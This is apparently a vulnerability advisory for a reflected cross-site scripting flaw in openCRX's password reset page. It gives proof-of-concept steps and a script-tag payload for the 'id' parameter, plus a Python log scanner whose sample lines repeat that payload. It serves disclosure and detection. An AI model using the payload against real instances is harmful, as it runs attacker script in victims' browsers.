CVE-2021-25959
Date: September 28, 2021
Overview
In OpenCRX, versions v4.0.0 through v5.1.0 are vulnerable to reflected Cross-site Scripting (XSS) due to unsanitized parameters in the password reset functionality. This allows execution of external JavaScript files in the browser of any user of the openCRX instance.
Details
OpenCRX is affected by a reflected XSS vulnerability that allows execution of external JavaScript files in the browser of any user of the openCRX instance. The vulnerability exists because parameters in the password reset functionality are reflected into the page without sanitization or output encoding.
PoC Details
Log in to the application as guest:guest by visiting http://localhost:8080/opencrx-core-CRX. Click on Security, then Request password reset, and click OK. A password request link shows up in the Alerts tab. Click on the yellow icon to open it and copy the password reset URL. An example password reset URL looks like this:
“http://localhost:8080/opencrx-core-CRX/PasswordResetConfirm.jsp?t=cO6BzWLpIElr5CF4n8IjzzZPmKrOuE1OIcJLIMWZ&p=CRX&s=Standard&id=guest”.
In the `id` parameter, insert the payload given below under PoC Code (note: change the IP and port accordingly).
Create a file poc.js locally and start a Python HTTP server in the directory containing the JS file. Now log in as admin-Standard:admin-Standard in a private window and paste the URL with the payload in the `id` parameter value. The external JS file is successfully called.
PoC Code
<script src="http://10.0.2.15/poc.js"></script>
Affected Environments
v4.0.0 - v5.1.0
Prevention
Upgrade to version org.opencrx:opencrx-core-config:5.2.0
Language: Java
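As an added defensive example (not part of the advisory or of openCRX): the following Python scans web-server access-log lines for PasswordResetConfirm.jsp requests whose reflected parameters carry markup, which is how an attempt against this issue would appear in logs on an instance that has not yet been upgraded to 5.2.0. The log lines are constructed; the PoC on this page confirms only `id`, so checking `p` and `s` as well is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2021:10:01:02 +0000] "GET /opencrx-core-CRX/PasswordResetConfirm.jsp?t=abc&p=CRX&s=Standard&id=guest HTTP/1.1" 200 512
10.0.0.9 - - [28/Sep/2021:10:02:11 +0000] "GET /opencrx-core-CRX/PasswordResetConfirm.jsp?t=abc&p=CRX&s=Standard&id=%3Cscript%20src%3D%22http%3A%2F%2F10.0.2.15%2Fpoc.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 640
10.0.0.7 - - [28/Sep/2021:10:03:00 +0000] "GET /opencrx-core-CRX/Login.jsp HTTP/1.1" 200 300
"""

# Extract the request target from a combined-format log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Heuristic: a legitimate openCRX principal name or segment never needs these,
# but an HTML/JS injection into a reflected parameter does.
SUSPICIOUS = re.compile(r'[<>"\']|javascript:|\bon[a-z]+\s*=', re.IGNORECASE)

# Parameters reflected by PasswordResetConfirm.jsp; only `id` is confirmed by
# the PoC, `p` and `s` are included as an assumption.
REFLECTED = ("id", "p", "s")


def reflected_params(target):
    """Return decoded values of the reflected parameters, or {} for other paths."""
    parts = urlsplit(target)
    if not parts.path.endswith("/PasswordResetConfirm.jsp"):
        return {}
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return {k: qs.get(k, [""])[0] for k in REFLECTED}


def find_suspicious(log_text):
    """Return (line_number, parameter, decoded_value) for every suspicious hit."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in reflected_params(m.group("target")).items():
            if SUSPICIOUS.search(value):
                hits.append((lineno, name, value))
    return hits


if __name__ == "__main__":
    for lineno, name, value in find_suspicious(SAMPLE_LOG):
        print(f"line {lineno}: parameter {name!r} contains markup: {value!r}")
```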
Good to know:
CVSS v3 metrics:
| Metric | Value |
|---|---|
| Base Score: | |
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | None |
| User Interaction (UI): | Required |
| Scope (S): | Changed |
| Confidentiality (C): | Low |
| Integrity (I): | Low |
| Availability (A): | None |
CVSS v2 metrics:
| Metric | Value |
|---|---|
| Base Score: | |
| Access Vector (AV): | Network |
| Access Complexity (AC): | Medium |
| Authentication (AU): | None |
| Confidentiality (C): | None |
| Integrity (I): | Partial |
| Availability (A): | None |